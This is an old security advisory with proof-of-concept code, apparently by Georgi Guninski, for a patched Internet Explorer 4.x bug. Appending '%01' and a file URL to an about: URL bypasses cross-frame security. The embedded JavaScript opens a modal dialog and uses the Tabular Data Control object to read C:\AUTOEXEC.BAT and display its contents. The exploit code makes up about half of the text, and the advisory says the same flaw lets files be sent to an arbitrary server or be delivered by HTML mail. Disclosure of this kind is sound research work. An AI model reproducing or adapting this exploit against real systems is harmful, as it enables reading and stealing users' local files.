msie4-autoexec.bat-tdc.txt

`Guninski's IE 4 reading AUTOEXEC.BAT.  
  
  
There is a bug in Internet Explorer 4.x (patched) which allows reading local files and sending them to an arbitrary server.  
  
The problem is: if you add '%01someURL' after the an about: URL, IE thinks that the document is loaded from the domain of 'someURL'.  
  
This circumvents "Cross-frame security" and opens several security holes.  
  
  
This will try to read C:\AUTOEXEC.BAT using TDC.  
  
The bug may be exploited using HTML mail message. The exploit uses Javascript.   
For more info see the source.  
  
  
Workaround: Disable Javascript.  
  
Written by http://www.geocities.com/ResearchTriangle/1711 - Georgi Guninski  
  
  
  
<SCRIPT>  
  
alert('This tries to read your AUTOEXEC.BAT\nWait few seconds.')  
  
s="about:<SCRIPT>a=window.open('view-source:x');a.document.open();a.document.write(\"<object id='myTDC' width=100 height=100 classid='CLSID:333C7BC4-460F-11D0-BC04-0080C7055A83'>"  
+"<param name='DataURL' value='c:/autoexec.bat'><param name='UseHeader' value=False><param name='CharSet' VALUE='iso-8859-1'><param name='FieldDelim' value='}'><param name='RowDelim' value='}'><param name='TextQualifier' value='}'>"  
+"</object><form><textarea datasrc='#myTDC' datafld='Column1' rows=10 cols=80></textarea></form>\");a.document.write('<SCRIPT>setTimeout(\"alert(document.forms[0].elements[0].value)\",4000)</SCRIPT');a.document.write('>');a.document.close();close()</"+"SCRIPT>%01file://c:/";  
  
  
b=showModalDialog(s);  
  
</SCRIPT>  
`